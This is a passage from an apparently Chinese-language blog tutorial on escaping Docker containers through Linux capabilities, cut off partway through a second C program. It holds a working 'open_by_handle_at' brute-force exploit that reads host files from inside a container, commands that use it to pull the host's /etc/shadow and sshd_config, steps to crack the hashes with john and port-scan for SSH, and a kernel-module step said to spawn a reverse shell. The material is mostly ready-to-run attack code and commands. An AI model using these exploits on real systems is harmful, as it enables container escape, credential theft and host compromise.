<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">obj-m += <span class="built_in">exp</span>.o</span><br><span class="line">all:</span><br><span class="line">	make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) modules</span><br><span class="line">clean:</span><br><span class="line">	make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) clean</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">insmod <span class="built_in">exp</span>.ko <span class="comment">//就会反弹shell</span></span><br><span class="line">rmmod <span class="built_in">exp</span>.ko</span><br></pre></td></tr></table></figure>

<h2 id="CAP-DAC-READ-SEARCH-CAP-DAC-OVERRIDE"><a href="#CAP-DAC-READ-SEARCH-CAP-DAC-OVERRIDE" class="headerlink" title="CAP_DAC_READ_SEARCH,CAP_DAC_OVERRIDE"></a>CAP_DAC_READ_SEARCH,CAP_DAC_OVERRIDE</h2><h3 id="测试环境配置-4"><a href="#测试环境配置-4" class="headerlink" title="测试环境配置"></a>测试环境配置</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it --cap-add=DAC_READ_SEARCH  ubuntu:<span class="number">18.04</span></span><br></pre></td></tr></table></figure>
<p>给了CAP_DAC_READ_SEARCH自动也会赋予CAP_DAC_OVERRIDE权限<br>但是如果只给CAP_DAC_OVERRIDE是不会给CAP_DAC_READ_SEARCH<br>只给CAP_DAC_OVERRIDE无法做到往宿主机写文件</p>
<h3 id="实际环境利用-4"><a href="#实际环境利用-4" class="headerlink" title="实际环境利用"></a>实际环境利用</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/self/status|grep CapEff</span><br></pre></td></tr></table></figure>
<p>发现有CAP_DAC_READ_SEARCH和CAP_DAC_OVERRIDE权限，代表我们可以任意读写主机上的文件</p>
<h4 id="读文件"><a href="#读文件" class="headerlink" title="读文件"></a>读文件</h4><p>于是我们拿&#x2F;etc&#x2F;hostname当作open_by_handle_at的入口</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;errno.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;dirent.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_file_handle</span> &#123;</span></span><br><span class="line">	<span class="type">unsigned</span> <span class="type">int</span> handle_bytes;</span><br><span class="line">	<span class="type">int</span> handle_type;</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">char</span> f_handle[<span class="number">8</span>];</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">die</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *msg)</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">&quot;%s&quot;</span>,msg);</span><br><span class="line">	<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">dump_handle</span><span class="params">(<span class="type">const</span> <span class="keyword">struct</span> my_file_handle *h)</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">&quot;[*] #=%d, %d, char nh[] = &#123;&quot;</span>, h-&gt;handle_bytes,</span><br><span class="line">	        h-&gt;handle_type);</span><br><span class="line">	<span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; h-&gt;handle_bytes; ++i) &#123;</span><br><span class="line">		<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">&quot;0x%02x&quot;</span>, h-&gt;f_handle[i]);</span><br><span class="line">		<span class="keyword">if</span> ((i + <span class="number">1</span>) % <span class="number">20</span> == <span class="number">0</span>)</span><br><span class="line">			<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">		<span class="keyword">if</span> (i &lt; h-&gt;handle_bytes - <span class="number">1</span>)</span><br><span class="line">			<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">&quot;, &quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">&quot;&#125;;\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">find_handle</span><span class="params">(<span class="type">int</span> bfd, <span class="type">const</span> <span class="type">char</span> *path, <span class="type">const</span> <span class="keyword">struct</span> my_file_handle *ih, <span class="keyword">struct</span> my_file_handle *oh)</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="type">int</span> fd;</span><br><span class="line">	<span class="type">uint32_t</span> ino = <span class="number">0</span>;</span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">my_file_handle</span> <span class="title">outh</span> =</span> &#123;</span><br><span class="line">		.handle_bytes = <span class="number">8</span>,</span><br><span class="line">		.handle_type = <span class="number">1</span></span><br><span class="line">	&#125;;</span><br><span class="line">	DIR *dir = <span class="literal">NULL</span>;</span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">dirent</span> *<span class="title">de</span> =</span> <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">	path = <span class="built_in">strchr</span>(path, <span class="string">&#x27;/&#x27;</span>);</span><br><span class="line"></span><br><span class="line">	<span class="comment">// recursion stops if path has been resolved</span></span><br><span class="line">	<span class="keyword">if</span> (!path) &#123;</span><br><span class="line">		<span class="built_in">memcpy</span>(oh-&gt;f_handle, ih-&gt;f_handle, <span class="keyword">sizeof</span>(oh-&gt;f_handle));</span><br><span class="line">		oh-&gt;handle_type = <span class="number">1</span>;</span><br><span class="line">		oh-&gt;handle_bytes = <span class="number">8</span>;</span><br><span class="line">		<span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	++path;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[*] Resolving &#x27;%s&#x27;\n&quot;</span>, path);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> ((fd = open_by_handle_at(bfd, (<span class="keyword">struct</span> file_handle *)ih, O_RDONLY)) &lt; <span class="number">0</span>)</span><br><span class="line">		die(<span class="string">&quot;[-] open_by_handle_at&quot;</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> ((dir = fdopendir(fd)) == <span class="literal">NULL</span>)</span><br><span class="line">		die(<span class="string">&quot;[-] fdopendir&quot;</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> (;;) &#123;</span><br><span class="line">		de = readdir(dir);</span><br><span class="line">		<span class="keyword">if</span> (!de)</span><br><span class="line">			<span class="keyword">break</span>;</span><br><span class="line">		<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[*] Found %s\n&quot;</span>, de-&gt;d_name);</span><br><span class="line">		<span class="keyword">if</span> (<span class="built_in">strncmp</span>(de-&gt;d_name, path, <span class="built_in">strlen</span>(de-&gt;d_name)) == <span class="number">0</span>) &#123;</span><br><span class="line">			<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[+] Match: %s ino=%d\n&quot;</span>, de-&gt;d_name, (<span class="type">int</span>)de-&gt;d_ino);</span><br><span class="line">			ino = de-&gt;d_ino;</span><br><span class="line">			<span class="keyword">break</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[*] Brute forcing remaining 32bit. This can take a while...\n&quot;</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (de) &#123;</span><br><span class="line">		<span class="keyword">for</span> (<span class="type">uint32_t</span> i = <span class="number">0</span>; i &lt; <span class="number">0xffffffff</span>; ++i) &#123;</span><br><span class="line">			outh.handle_bytes = <span class="number">8</span>;</span><br><span class="line">			outh.handle_type = <span class="number">1</span>;</span><br><span class="line">			<span class="built_in">memcpy</span>(outh.f_handle, &amp;ino, <span class="keyword">sizeof</span>(ino));</span><br><span class="line">			<span class="built_in">memcpy</span>(outh.f_handle + <span class="number">4</span>, &amp;i, <span class="keyword">sizeof</span>(i));</span><br><span class="line"></span><br><span class="line">			<span class="keyword">if</span> ((i % (<span class="number">1</span>&lt;&lt;<span class="number">20</span>)) == <span class="number">0</span>)</span><br><span class="line">				<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[*] (%s) Trying: 0x%08x\n&quot;</span>, de-&gt;d_name, i);</span><br><span class="line">			<span class="keyword">if</span> (open_by_handle_at(bfd, (<span class="keyword">struct</span> file_handle *)&amp;outh, <span class="number">0</span>) &gt; <span class="number">0</span>) &#123;</span><br><span class="line">				closedir(dir);</span><br><span class="line">				close(fd);</span><br><span class="line">				dump_handle(&amp;outh);</span><br><span class="line">				<span class="keyword">return</span> find_handle(bfd, path, &amp;outh, oh);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	closedir(dir);</span><br><span class="line">	close(fd);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> * argv[])</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span>(argc!=<span class="number">3</span>)&#123;</span><br><span class="line">        die(<span class="string">&quot;Usages ./read filename save_filename&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">	</span><br><span class="line">    <span class="comment">// get a FS reference from something mounted in from outside</span></span><br><span class="line">	<span class="type">int</span> fd1;</span><br><span class="line">    <span class="keyword">if</span> ((fd1 = open(<span class="string">&quot;/etc/hostname&quot;</span>, O_RDONLY)) &lt; <span class="number">0</span>)</span><br><span class="line">		die(<span class="string">&quot;[-] open outside file error&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">my_file_handle</span> <span class="title">h</span>;</span></span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">my_file_handle</span> <span class="title">root_h</span> =</span> &#123;</span><br><span class="line">		.handle_bytes = <span class="number">8</span>,</span><br><span class="line">		.handle_type = <span class="number">1</span>,</span><br><span class="line">		.f_handle = &#123;<span class="number">0x02</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>&#125;</span><br><span class="line">	&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (find_handle(fd1, argv[<span class="number">1</span>], &amp;root_h, &amp;h) &lt;= <span class="number">0</span>)</span><br><span class="line">		die(<span class="string">&quot;[-] Cannot find valid handle!&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    dump_handle(&amp;h);</span><br><span class="line">    <span class="type">int</span> fd2;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> ((fd2 = open_by_handle_at(fd1, (<span class="keyword">struct</span> file_handle *)&amp;h, O_RDONLY)) &lt; <span class="number">0</span>)</span><br><span class="line">		die(<span class="string">&quot;[-] open_by_handle&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> buf[<span class="number">0x1000</span>];</span><br><span class="line">	<span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span>(buf));</span><br><span class="line">	<span class="keyword">if</span> (read(fd2, buf, <span class="keyword">sizeof</span>(buf) - <span class="number">1</span>) &lt; <span class="number">0</span>)</span><br><span class="line">		die(<span class="string">&quot;[-] read&quot;</span>);</span><br><span class="line">    FILE *p;</span><br><span class="line">    <span class="keyword">if</span>((p = fopen(argv[<span class="number">2</span>], <span class="string">&quot;w&quot;</span>))==<span class="literal">NULL</span>)&#123;</span><br><span class="line">        die(<span class="string">&quot;open write file failed&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="built_in">fputs</span>(buf, p);</span><br><span class="line">        fclose(p);</span><br><span class="line">    &#125;</span><br><span class="line">	close(fd2); </span><br><span class="line">    close(fd1);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./read  /etc/shadow shadow</span><br></pre></td></tr></table></figure>
<p>会把宿主机的&#x2F;etc&#x2F;shadow读出来，保存在shadow文件里</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./read /etc/ssh/sshd_config sshd_config</span><br></pre></td></tr></table></figure>
<p>查看是否可以root登陆，是否可以使用密码登陆</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat sshd_config|grep PermitRootLogin</span><br><span class="line">cat sshd_config|grep PasswordAuthentication</span><br></pre></td></tr></table></figure>
<p>然后把shadow里面的密码用john进行爆破，保存格式如下图，加不加用户名都可以</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root:password</span><br><span class="line">password</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john passwd --wordlist=password.txt</span><br></pre></td></tr></table></figure>
<p>爆破出密码了扫描ssh端口</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nvz -w2  <span class="number">172.17</span><span class="number">.0</span><span class="number">.1</span> <span class="number">1</span><span class="number">-65535</span> <span class="number">2</span>&gt;&amp;<span class="number">1</span>|grep succeeded</span><br></pre></td></tr></table></figure>
<p>然后ssh登陆就好</p>
<h4 id="写文件"><a href="#写文件" class="headerlink" title="写文件"></a>写文件</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;errno.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;dirent.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_file_handle</span> &#123;</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> handle_bytes;</span><br><span class="line">  <span class="type">int</span> handle_type;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> f_handle[<span class="number">8</span>];</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">void</span> <span class="title function_">die</span><span class="params">(<span class="type">const</span> <span class="type">char</span> * msg)</span> &#123;</span><br><span class="line">  <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">&quot;%s&quot;</span>,msg);</span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">void</span> <span class="title function_">dump_handle</span><span class="params">(<span class="type">const</span> <span class="keyword">struct</span> my_file_handle * h)</span> &#123;</span><br><span class="line">  <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[*] #=%d, %d, char nh[] = &#123;&quot;</span>, h -&gt; handle_bytes,</span><br><span class="line">    h -&gt; handle_type);</span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; h -&gt; handle_bytes; ++i) &#123;</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;0x%02x&quot;</span>, h -&gt; f_handle[i]);</span><br><span class="line">    <span class="keyword">if</span> ((i + <span class="number">1</span>) % <span class="number">20</span> == <span class="number">0</span>)</span><br><span class="line">      <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;\n&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (i &lt; h -&gt; handle_bytes - <span class="number">1</span>)</span><br><span class="line">      <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;, &quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;&#125;;\n&quot;</span>);</span><br><span class="line">&#125; </span><br><span class="line"><span class="type">int</span> <span class="title function_">find_handle</span><span class="params">(<span class="type">int</span> bfd, <span class="type">const</span> <span class="type">char</span> *path, <span class="type">const</span> <span class="keyword">struct</span> my_file_handle *ih, <span class="keyword">struct</span> my_file_handle *oh)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> fd;</span><br><span class="line">  <span class="type">uint32_t</span> ino = <span class="number">0</span>;</span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">my_file_handle</span> <span class="title">outh</span> =</span> &#123;</span><br><span class="line">    .handle_bytes = <span class="number">8</span>,</span><br><span class="line">    .handle_type = <span class="number">1</span></span><br><span class="line">  &#125;;</span><br><span class="line">  DIR * dir = <span class="literal">NULL</span>;</span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">dirent</span> * <span class="title">de</span> =</span> <span class="literal">NULL</span>;</span><br><span class="line">  path = <span class="built_in">strchr</span>(path, <span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">  <span class="comment">// recursion stops if path has been resolved</span></span><br><span class="line">  <span class="keyword">if</span> (!path) &#123;</span><br><span class="line">    <span class="built_in">memcpy</span>(oh -&gt; f_handle, ih -&gt; f_handle, <span class="keyword">sizeof</span>(oh -&gt; f_handle));</span><br><span class="line">    oh -&gt; handle_type = <span class="number">1</span>;</span><br><span class="line">    oh -&gt; handle_bytes = <span class="number">8</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  ++path;</span><br><span class="line">  <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[*] Resolving &#x27;%s&#x27;\n&quot;</span>, path);</span><br><span class="line">  <span class="keyword">if</span> ((fd = open_by_handle_at(bfd, (<span class="keyword">struct</span> file_handle * ) ih, O_RDONLY)) &lt; <span class="number">0</span>)</span><br><span class="line">    die(<span class="string">&quot;[-] open_by_handle_at&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span> ((dir = fdopendir(fd)) == <span class="literal">NULL</span>)</span><br><span class="line">    die(<span class="string">&quot;[-] fdopendir&quot;</span>);</span><br><span class="line">  <span class="keyword">for</span> (;;) &#123;</span><br><span class="line">    de = readdir(dir);</span><br><span class="line">    <span class="keyword">if</span> (!de)</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[*] Found %s\n&quot;</span>, de -&gt; d_name);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strncmp</span>(de -&gt; d_name, path, <span class="built_in">strlen</span>(de -&gt; d_name)) == <span class="number">0</span>) &#123;</span><br><span class="line">      <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[+] Match: %s ino=%d\n&quot;</span>, de -&gt; d_name, (<span class="type">int</span>) de -&gt; d_ino);</span><br><span class="line">      ino = de -&gt; d_ino;</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[*] Brute forcing remaining 32bit. This can take a while...\n&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span> (de) &#123;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">uint32_t</span> i = <span class="number">0</span>; i &lt; <span class="number">0xffffffff</span>; ++i) &#123;</span><br><span class="line">      outh.handle_bytes = <span class="number">8</span>;</span><br><span class="line">      outh.handle_type = <span class="number">1</span>;</span><br><span class="line">      <span class="built_in">memcpy</span>(outh.f_handle, &amp; ino, <span class="keyword">sizeof</span>(ino));</span><br><span class="line">      <span class="built_in">memcpy</span>(outh.f_handle + <span class="number">4</span>, &amp; i, <span class="keyword">sizeof</span>(i));</span><br><span class="line">      <span class="keyword">if</span> ((i % (<span class="number">1</span> &lt;&lt; <span class="number">20</span>)) == <span class="number">0</span>)</span><br><span class="line">        <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;[*] (%s) Trying: 0x%08x\n&quot;</span>, de -&gt; d_name, i);</span><br><span class="line">      <span class="keyword">if</span> (open_by_handle_at(bfd, (<span class="keyword">struct</span> file_handle * ) &amp; outh, <span class="number">0</span>) &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        closedir(dir);</span><br><span class="line">        close(fd);</span><br><span class="line">        dump_handle( &amp; outh);</span><br><span class="line">        <span class="keyword">return</span> find_handle(bfd, path, &amp; outh, oh);</span><br><span class="line">      &#125;</span><br><span 